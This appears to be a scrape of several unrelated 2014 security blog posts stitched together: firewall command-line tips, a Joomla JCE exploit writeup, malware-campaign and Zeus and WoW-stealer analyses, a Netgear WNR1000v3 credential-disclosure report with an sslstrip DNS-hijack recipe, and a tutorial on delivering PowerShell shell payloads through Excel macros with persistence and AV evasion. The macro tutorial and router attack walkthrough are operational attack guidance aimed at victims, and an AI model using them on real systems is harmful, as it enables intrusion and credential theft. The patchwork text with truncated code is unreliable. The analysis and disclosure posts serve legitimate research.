Monthly Archives: January 2014

Episode #174: Lightning Lockdown

Hal firewalls fast

Recently a client needed me to quickly set up an IP Tables firewall on a production server that was effectively open on the Internet. I knew very little about the machine, and we couldn't afford to break any of the production traffic to and from the box.

It occurred to me that a decent first approximation would be to simply look at the network services currently in use, and create a firewall based on that. The resulting policy would probably be a bit more loose than it needed to or should be, but it would be infinitely better than no firewall at all!

I went with lsof, because I found the output easier to parse than netstat:

# lsof -i -nlP | awk '{print $1, $8, $9}' | sort -u
httpd TCP *:80
named TCP
named TCP
named TCP [::1]:953
named TCP
named UDP
named UDP
ntpd UDP [::1]:123
ntpd UDP *:123
ntpd UDP
ntpd UDP
ntpd UDP [fe80::baac:6fff:fe8e:a0f1]:123
ntpd UDP [fe80::baac:6fff:fe8e:a0f2]:123
portreser UDP *:783
sendmail TCP
sendmail TCP>
sendmail TCP *:587
sshd TCP *:22
sshd TCP>

I could have left off the process name, but it helped me decide which ports were important to include in the new firewall rules. Honestly, the output above was good enough for me to quickly throw together some workable IP Tables rules. I simply saved the output to a text file and hacked things together with a text editor.

But maybe you only care about the port information:

# lsof -i -nlP | awk '{print $9, $8, $1}' | sed 's/.*://' | sort -u
123 UDP ntpd
1526 TCP sendmail
22 TCP sshd
25 TCP sendmail
39054 TCP sshd
53 TCP named
53 UDP named
587 TCP sendmail
783 UDP portreser
80 TCP httpd
953 TCP named

Note that I inverted the field output order, just to make my sed a little easier to write

If you wanted to go really crazy, you could even create and load the actual rules on the fly. I don't recommend this at all, but it will make Tim's life harder in the next section, so here goes:

lsof -i -nlP | tail -n +2 | awk '{print $9, $8}' | 
sed 's/.*://' | sort -u | tr A-Z a-z |
while read port proto; do ufw allow $port/$proto; done

I added a "tail -n +2" to get rid of the header line. I also dropped the command name from my awk output. There's a new "tr A-Z a-z" in there to lower-case the protocol name. Finally we end with a loop that takes the port and protocol and uses the ufw command line interface to add the rules. You could do the same with the iptables command and its nasty syntax, but if you're on a Linux distro with UFW, I strongly urge you to use it!

So, Tim, I figure you can parse netstat output pretty easily. How about the command-line interface to the Windows firewall? Remember, adversity builds character...

Tim builds character

When I first saw this I thought, "Man, this is going to be easy with the new cmdlets in PowerShell v4!" There are a lot of new cmdlets available in PowerShell version 4, and both Windows 8.1 and Server 2012R2 ship with PowerShell version 4. In addition, PowerShell version 4 is available for Windows 7 SP1 (and later) and Windows Server 2008 R2 SP1 (and later).

The first cmdlet that will help us out here is Get-NetTCPConnection. According to the help page this cmdlet "gets current TCP connections. Use this cmdlet to view TCP connection properties such as local or remote IP address, local or remote port, and connection state." This is going to be great! But...

It doesn't mention the process ID or process name. Nooooo! This can't be. Let's look at all the properties of the output objects.

PS C:\> Get-NetTCPConnection | Format-List *

State : Established
AppliedSetting : Internet
Caption :
Description :
ElementName :
InstanceID :
CommunicationStatus :
DetailedStatus :
HealthState :
InstallDate :
Name :
OperatingStatus :
OperationalStatus :
PrimaryStatus :
Status :
StatusDescriptions :
AvailableRequestedStates :
EnabledDefault : 2
EnabledState :
OtherEnabledState :
RequestedState : 5
TimeOfLastStateChange :
TransitioningToState : 12
AggregationBehavior :
Directionality :
LocalAddress :
LocalPort : 445
RemoteAddress :
RemotePort : 49278
PSComputerName :
CimClass : ROOT/StandardCimv2:MSFT_NetTCPConnection
CimInstanceProperties : {Caption, Description, ElementName, InstanceID...}
CimSystemProperties : Microsoft.Management.Infrastructure.CimSystemProperties

Dang! This will get most of what we want (where "want" was defined by that Hal guy), but it won't get the process ID or the process name. So much for rubbing the new cmdlets in his face.

Let's forget about Hal for a second and get what we can with this cmdlet.

PS C:\> Get-NetTCPConnection | Select-Object LocalPort | Sort-Object -Unique LocalPort

This is helpful for getting a list of ports, but not useful for making decisions about what should be allowed. Also, we would need to run Get-NetUDPEndpoint to get the UDP connections. This is so close, yet so bloody far. We have to resort to the old school netstat command and the -b option to get the executable name. In episode 123 we needed parsed netstat output. I recommended the Get-Netstat script available at Sadly, we are going to have to resort to that again. With this script we can quickly get the port, protocol, and process name.

PS C:\> .\get-netstat.ps1 | Select-Object ProcessName, Protocol, LocalPort | 
Sort-Object -Unique LocalPort, Protocol, ProcessName

ProcessName Protocol Localport
----------- -------- ---------
svchost TCP 135
System UDP 137
System UDP 138
System TCP 139
svchost UDP 1900
svchost UDP 3540
svchost UDP 3544
svchost TCP 3587
dasHost UDP 3702
svchost UDP 3702
System TCP 445
svchost UDP 4500

It should be pretty obvious that the port 137-149 and 445 should not be accessible from the internet. We can filter these ports out so that we don't allow these ports through the firewall.

PS C:\> ... | Where-Object { (135..139 + 445) -NotContains $_.LocalPort }
ProcessName Protocol Localport
----------- -------- ---------
svchost UDP 1900
svchost UDP 3540
svchost UDP 3544
svchost TCP 3587
dasHost UDP 3702
svchost UDP 3702
svchost UDP 4500

Now that we have the ports and protocols we can create new firewall rules using the new New-NetFirewallRule cmdlet. Yeah!

PS C:\> .\get-netstat.ps1 | Select-Object Protocol, LocalPort | Sort-Object -Unique * | 
Where-Object { (135..139 + 445) -NotContains $_.LocalPort } |
ForEach-Object { New-NetFirewallRule -DisplayName AllowedByScript -Direction Outbound
-Action Allow -LocalPort $_.LocalPort -Protocol $_.Protocol }

Name : {d15ca484-5d16-413f-8460-a29204ff06ed}
DisplayName : AllowedByScript
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Outbound
Action : Allow
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local

These new firewall cmdlets really make things easier, but if you don't have PowerShellv4 you can still use the old netsh command to add the firewall rules. Also, the Get-Netstat will support older version of PowerShell as well, so this is nicely backwards compatible. All we need to do is replace the command inside the ForEach-Object cmdlet's script block.

PS C:\> ... | ForEach-Object { netsh advfirewall firewall add rule 
name="AllowedByScript" dir=in action=allow protocol=$_.Protocol
localport=$_.LocalPort }

Invasion of JCE Bots

Joomla has been one of the most popular CMS for a long time.  It powers a huge number of sites.  That’s great! The flip side of this fact is Joomla has been very popular for a long time and there are still very many sites that use older versions of Joomla as well as older version of Joomla components. For example, the 1.5.x branch of Joomla (2008-2010) still has a noticeable share in live Joomla sites.

Old versions may work well for your site but they have multiple well known security holes, so they are the low hanging fruit for hackers. Let me show this using a real world example.

JCE attack

There is a JCE component — a fancy content editor that can be found almost on every Joomla site. It has a well known security hole that allows anyone to upload arbitrary files to a server.

You can easily find a working exploit code for this vulnerability.  What it does is:

  1. Checks whether a vulnerable version of JCE is installed (2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15,,,,,
  2. Exploits the bug in the JCE image manager to upload a PHP file with a .gif extenstion to the images/stories directory
  3. Then uses a JSON command to rename the .gif file to *.php.

Now you have a backdoor on a server and can do whatever you want with the site.

This is how this attack looks in logs (real example): - - [23/Jan/2014:16:46:54 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)" - - [23/Jan/2014:16:46:55 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 329 "-" "BOT/0.1 (BOT for JCE)" - - [23/Jan/2014:16:46:55 -0500] "GET /images/stories/3xp.php HTTP/1.0" 200 465 "-" "BOT/0.1 (BOT for JCE)"

As I mentioned, JCE is a very popular component and there are still many sites that use old versions of this component. No wonder, hackers are scanning the Internet for such vulnerable sites.  They reworked the exploit code for use in their automated tools that relentlessly test millions of sites, one by another.  These days, I can find multiple requests with the “BOT/0.1 (BOT for JCE)” User-Agent string in logs of almost every site that I check, even in logs of sites that have never had Joomla installed.

I’d like to share some interesting statistics of a real site that had been hacked using this JCE hole and then was being routinely reinfected every day.

  • 7,409 requests with the User-Agent “BOT/0.1 (BOT for JCE)” that came from 785 different IPs during the period of Dec 24th – Jan 24th (one month)
  • 239 requests from 51 unique IP addresses during the last 24 hours
  • 4 independent (uploaded different types of backdoors) successful infections during one day.
  • plus, multiple tests for other vulnerabilities.

To webmasters

As you can see,  this is something that you can’t neglect or consider an insignificant threat.  It’s silly to hope that hackers won’t find your site. Today hackers have resources to spider the Internet almost as efficiently as Google just about 10 years ago, so there is almost no chance your site will stay unnoticed. The only way to prevent the hacks is to be proactive:  keep all software up-to-date and harden your sites.

In case of this particular JCE attack:

  1. Make sure to upgrade your Joomla site to the most current version.
  2. Upgrade JCE to the latest version. You can find download packages for all the three branches of Joomla here.
  3. Protect all file upload directories and all directories that shouldn’t contain .php files. For example, place the following .htaccess file there to prevent execution of PHP files:
    <Files *.php>
    deny from all
  4. Try blocking requests with the “BOT/0.1 (BOT for JCE)” User-Agent string.  Of course, this shouldn’t be considered as a real protection. Hackers can change the User-Agent string to whatever they want. But it can help keep some dumb annoying bots away from your site.
  5. If, for some reason, you can’t upgrade your site at this moment, consider placing it behind a website firewall that will block any malicious traffic before it reaches your server.  This is something that we call virtual patching in Sucuri CloudProxy.

Inside A Malware Campaign

A while back I received some spam email with the theme of adding new friends of facebook. This is how I became aware of the campaign now known as the "Aqua VPN" campaign.

World renowned and internationally respected anti virus vendor MalwareBytes also blogged about this campaign here (thanks to @paperghost)

After gaining admin rights to the web panel I built a sjdb (silent java driveby) here is what I found.

Build options

More build options

Lets take a look at the available domains: of all those domains
(no need for aquavpn thats already well known)
osrsbot(.)net >
twitch (.)pw > (trying to lure gamers thinking this is the real twitch url) << confirmed takedown by @vriesHd now this domain leads to a 502. 
ucam(.)me >
videoreaper(.)com >
live-stream(.)us >
teentalk(.)us >
rapid-miner(.)net >

what a surprise! all registered by namecheap

Now for a scan of the .jar
(virustotal was down but I have scanned this file on there before)
in the meantime this will do

Add-on Domains!
If you want you can spend a little extra money and ill be honest, one of these domains is very good for social engineering.

riotpointgenerator(.)com >
leageuoflegends(.)com >

Both these registrars have had abuse reports sent and im awaiting response

Namecheap exposed: official press release

Official press notice regarding namecheap corruption:

Legal disclaimer: any articles linked or people mentioned are in no way affiliated and or associated with this press release. The companies and or person(s) are in no way responsible for the content in this press release 

Recently, I noticed a spam campaign exploiting the "new friend on Facebook" email template to lure users into clicking malicious links. Confirmation of this has been confirmed by malwareBytes here by @paperghost. The domain is registered by namecheap. Proof of registration here

I've contacted namecheap via twitter,phone and email proof of contact here and here their response in summary, they refuse to suspend the domain as the domain doesn't use their hosting ( can easily suspend the domain the same way they would do with a ICANN or ic3 request).

This company is completely corrupt and is perfectly happy to be the registrar behind a huge malware campaign. I've contacted them at least 30 times by now and they've made absolutely no effort to even consider elevating this to management never mind suspend the domain. 

We can't shut down the hosting. Why? Because the hosting is considered "bulletproof" and completely ignores reports (even ic3). Seems namecheap is heading towards this "bulletproof" registrar theme. 

After hacking the administration panel of this exploit kit I've noticed figures anywhere from 4-10k successful infections DAILY. This is a huge infection vector considering the publicly this campaign has received. 

This press release will be forwarded too several news agencies and independent journalists.

Any questions.
Twitter: @trojan7sec

MIT(R)M Attacks – Your middle or mine?


Recently (actually months ago now) my wife went out to see some friends from Church which left me with a couple of hours to kill at home (after I put the kids bed of course). I decided to use this opportunity to look for security vulnerabilities in the wireless router provided by my ISP.

I installed the latest firmware update on the device and soon discovered a serious vulnerability in the router's password recovery feature (when exploited this vulnerability will display the admin credentials of the router in cleartext).

Note: At this point some of you might be thinking....siiiiiigghhhhhhh...."so a consumer grade wireless router has a security vulnerability...what's new...most home users don't bother changing the default username and password anyway"...right...but stay with me it gets better.

I didn't have much time to contact the vendor directly, so I decided to write up a description and send it off to Secunia. After several days I received back the following response:

We have received your report regarding <censored> wireless
router. But, unfortunately, we are not able to consider it as a SVCRP [1]
report as we do not have said device on our premise and subsequently cannot
confirm the vulnerability within our secure test environment.

Therefore, we will not process this report. In case you would like these
issues to be addressed by the vendor, we would like to encourage you to
report them to the vendor directly.

Thank you for reporting this to us though. We look forward to receive more
reports from you.

What!? know they sell these at Walmart right? Well you can't really blame Secunia, what can you really do with admin access to a home wireless router anyway?  Well...let's take a look....

Before we delve into this further I should note that I attempted desperately to report the vulnerability to the vendor directly. This process was soooooo insanely difficult that it actually drove me to about 18 seconds of maniacal laughter. I seriously don't know if the internal communication was just horrible (I actually started getting emails back from the vendor addressing me as "Ms. Difrank"), or if they just DO NOT CARE!

There are actually many different attack vectors that can be leveraged once you compromise a home wireless router (or any router), but in the interest of brevity I just want to discuss one that hasn't been given enough attention (IMO).

Typically, Man-in-the-Middle (MITM) attacks are launched from "close" range against local networks. One has to ask the question though...where exactly is the "middle"? Without getting too philosophical, I'm going to suggest that the "middle" is can be any point between the source and the destination.

With that being said lets see how we can launch a Man-in-the-Relative-Middle attack against users connected to a home wireless router from anywhere in the "middle" (even over the Internet).

Note: This example focuses on intercepting HTTP/S traffic only.

Configure A Malicious DNS Server

First, I configure my laptop as a DNS server that will respond to all DNS requests with my laptop's IP address. There are many different ways/tools to do this, but for this demo I decided to use a simple BIND configuration that will respond to all DNS requests with my laptop IP.

Note: I don't recommend this technique in an actual Pentest, it's better to target specific domains (facebook, linkedin, google, etc.) 

1.) Add a new entry into your named.conf.local file for the "root" domain

2.) Setup a new zone file for the root domain (in this case "db.any") and copy it to the directory specified within your named.conf.options

After restarting the BIND service any DNS requests submitted to the server will return the IP address of the attacking system (in this case

Note: I'm using an IP address on the local LAN, when launching this attack over the Internet you would configure this with your public IP.

Configure sslstrip

 Most sensitive information that traverses the web now days is encrypted using SSL/TLS. Rather than configuring an inline proxy server to intercept HTTP/S requests (which will work but generate certificate errors on the client) I've decided to use one of my favorite tools: "sslstrip".

Note: If you aren't familiar with sslstrip I encourage you to take a look here

Typically we would use sslstrip in addition to IP forwarding, ARP spoofing, and port redirection techniques on the local LAN (which is what it was designed for), but it also works pretty well just by kicking it off and sending web traffic directly to it.

Start sslstrip: 
sslstrip -l 80 -p -w sslposts.txt

This will configure sslstrip to listen on tcp port 80 and log all HTTP POSTs to the file sslposts.txt

Monitor HTTP POSTs:
tail -f sslposts.txt

Now that our server is configured, we simply modify the DNS settings on the WAN interface of our target router to point to our malicious server IP.

All HTTPS requested pages will be transparently replaced with HTTP pages (much more going on under the hood but I want to keep this short and sweet).

The login credentials can be seen in the HTTP POST log:

Ok...but how do we change the DNS settings in the router?

Most Home Internet routers are notorious for having security vulnerabilities. Let's take a look at the vulnerability I discovered and reported back in April 2013 (still vulnerable today).

The vulnerability I discovered affects NETGEAR N150 wireless routers identified as WNR1000v3. A flaw in the password recovery feature of this device allows an attacker to retrieve the router administrator username and password in cleartext.

Note:The router is vulnerable EVEN IF PASSWORD RECOVERY IS DISABLED!

I wrote a quick proof-of-concept script that extracts the username and password from a vulnerable router. I named the script "wnroast" since WNR sounds like "wiener"  to me   :) <target ip> <target port>

Roasting the WNR:

Doing a Shodanhq search for WNR1000v3 reveals almost 14,000 hits! Imagine a scenario where an exploit for this vulnerability is scripted and hundreds of devices begin using malicious DNS servers, the impact would be severe.

Again MITRM represents only one of MANY attack vectors that may be taken once an attacker gains control of a home Internet router.

I should also mention that tools like sslstrip aren't really designed to work over the web so you will notice some pages don't load right or at all without additional customization.

There is certainly much more that could be said on this topic, but I'm out of time and I need to wrap this up.

In Closing:

The following are some recommendations to consider when securing administration access to your home Internet router.

  1. Disable remote administration access (over the web) or at least restrict it to trusted IPs only
  2. Whenever Possible - disable access to the administration page from the Wireless LAN (wired only)
That's all the time I've got time at this point, let's hope this gets patched soon!

Special thanks to wildB1ll for helping me test this out!

WNRoast Download: can be downloaded here

Update (7-5-14): Metasploit aux mod available here

Full Disclosure Details:

The following is my original submission to Secunia and NETGEAR disclosing the details of the vulnerability:

Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery vulnerability. Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and subsequently gain full access to the device. This vulnerabilty can be exploited remotely if the remote administration access feature is enabled (as well as locally via wired or wireless access).
Tested Device Model: NETGEAR N150 WNR1000v3
Tested Device Firmware Versions: V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for guest and private network) firewall rule and port forwarding manipulation, etc.
The password recovery mechanism appears to be designed to work as follows:
1.) After failing to login the user will be redirected to a password recovery page that requests the router serial number
2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 2 secret questions
3.) If the user answers the secret questions correctly, the router username and password is displayed
The problem: The implementation of this password recovery method has issues...lots of issues
Vulnerability and Exploit Details:
1.) Access the router login through a web browser:
2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary credentials), the router responds with the following (Note the "unauth.cgi?id" parameter):

HTTP/1.0 401 Unauthorized

WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"

Content-type: text/html


<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>

<title>401 Unauthorized</title></head>

<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>

<p>Access to this resource is denied, your client has not supplied the correct authentication.</p><form method="post" action="unauth.cgi?id=78185530" name="aForm"></form></body>

3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request:
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 35
Connection: Keep-Alive
Pragma: no-cache

The username and (plaintext) password are returned in the response (truncated for brevity):
 <td class="MNUText" align="right">Router Admin Username</td>
 <td class="MNUText" align="left">admin</td>
 <td class="MNUText" align="right">Router Admin Password</td>
 <td class="MNUText" align="left">D0n'tGuessMe!</td>

Decoding Zeus dynamic config

I got a look on the zeus builder who was released by the MMBB guy on, finally i'm decided to write something about it, so let's talk about the change in the config encryption.
MD5: 0a05783316e7f765e731aadf5098564f

This version use AES instead of RC4 and can interact with the latest version of Firefox.
Anyway it's nothing more than a basic Zeus v2.

iBank parser on the panel, monitoring of process:
About the panel, the released version require Ioncube loader (nvm, the gate code can be recovered easily)

Now let's view an example of report from modules, keylog+screenshot:

Part of the static config (in plain on generated bot):

Installation process/dynamic config decoding (beware, dubstep):

And a small code because it's easier to understand:
    function decode($data, $key) {
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
        $iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
        mcrypt_generic_init($td, $key, $iv);
        mcrypt_generic($td, $data);
        $data = mdecrypt_generic($td, $data);
        return $data;
    function visualDecrypt(&$data) {
        $len = strlen($data);
        if ($len > 0)
            for ($i = $len - 1; $i > 0; $i--)
                $data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));
    $data    = file_get_contents('config.bin');
    $key     = md5('hasd7h12g1', true);
    $decoded = decode($data, $key);
    $size = strlen($decoded);
    header('Content-Type: application/octet-stream;');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . $size);
    header('Content-Disposition: attachment; filename=config_decrypted.dll');
    header('Expires: 0');
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');

You can find the decoded modules here:
JAVA: 7d7ae6ffbd9f3c7673b339f9b94493e5
BSS: cc98dabebe047c6115a6cd9d13ed3122
KEYLOG: 8ac1c7c019d16ff3b8a9543d46ae5e0e

And if you want to test yourself the WebInject, i usually use this code:
set_url* GP

<center><img src="" alt="Injected!"></center>




Recently a malware who target World of Warcraft got identified.
This threat is known as Disker, Mal/DllHook-A or Trojan.Siggen5.64266 and can steal player accounts even if they use a Authenticator.
Yes, this is another post about password stealer mawlare...

 There is no option to retain password on the WoW client.

The method used to spread this malware is by fake websites leading to malicious download.
The Trojan is bundled with legit programs such as WowMatrix or Curse Client, used by players to manage their AddOns.

Malicious Wowmatrix installer. (DCDD6986941B2B4E78A558CAB3ACF337)

Fake sites:
• dns: 1 ›› ip: - adress: WWW.CURSE.PW
• dns: 1 ›› ip: - adress: WWW.WOWMATRIX.PW
• dns: 1 ›› ip: - adress: WWW.WOWMATRIX.PW.PW

Blizzard released a statement due to this new threat:

I don't know how work the dll for the moment (at least a bit)
My debugger got some stability issue when handling wow.exe but i will get back on this, the mechanism seem interesting (and they even use OutputDebugString!).

Network trafic after login in:

C&C (in Chinese):

Compromised accounts:

That all for the moment :)

Deliver powershell payload using macro.

In past we saw method of direct shell code execution in Ms word or Excel using macro;but if document is closed then we will lose our shell so we have to migrate to other process and sometimes migration is pick up by AV. So in this tutorial we are going to use powershell payload.

Advantages of this method:-

(2)Migration is not needed
(3)AV bypass

(1)First we will generate powershell payload; for this purpose i used SET.You can also used Veil or powersploit.Open SET in terminal & select Social-Engineering Attacks and then Powershell Attack Vectors.Generate Powershell Alphanumeric Shellcode Injector.Fill LHOST & LPORT value.


Our generated powershell payload is located into /root/.set/reports/powershell/. Rename x86_powershell_injection.txt to x32.ps1.

(2)Now Clone git repository of code

root@bt:~# git clone
root@bt:~# cd Powershell-payload-Excel-Delivery/

(3)In Powershell-payload-Excel-Delivery folder; rename RemovePayload.bat to remove.bat. Now you have to host remove.bat and x32.ps1 to web-server.Then open persist.vbs file and change URL of x32.ps1 in line 13,33 to your hosted x32.ps1 `s URL. And now also host persist.vbs to web-server. I used localhost.


(4)Open Macrocode file from cloned folder & change URL in line 27,82,118 respectively to your hosted x32.ps1,persist.vbs and remove.bat `s URL.Now add this macro code into excel document as mentioned in previous tutorial.

(5)And last step is setup listener.


Now send this document to victim , as soon as he open document and run macro we will get shell. Once the payload is ran, it runs in the powershell process, so if the user closes excel, you keep your shell. You also remain in a stable process until reboot, so migration is not needed.


It then pulls down a persistence script, drops it, creates a registry key for autorun for the persistence script. Once done, it also drops a self-deleting bat file that removes the initial payload from the system.

persist using regestiry

Thanks to  enigma0x3 for this awesome method.

Update :- New-Powershell-Payload-Excel-Delivery

This is a VBA macro that uses Matt Graeber's Invoke-Shellcode to execute a powershell payload in memory as well as schedule a task for persistence(20 min onidle  you get shell).
root@bt:~# git clone
root@bt:~# cd Powershell-Payload-Excel-Delivery/

Open MacroCode file & change Download URL for Invoke-Shellcode file & change LHOST & LPORT option. Now add macro-code in Excel file & start-up listener.

Jolly Roger Stealer

Friend Kafeine have already do a post on it, although someone recently sent me a url on my cybercrime tracker.. i give a f%$k
• dns: 1 ›› ip: - adresse: LOADER.ISTMEIN.DE

Bot statistic:
CPU "Arhitecture"


Search module:



Create task:

Task statistic:

I haven't looked at a sample because i don't have it but sound very lame, like Plasma HTTP who grab everything without checking if there is already a double.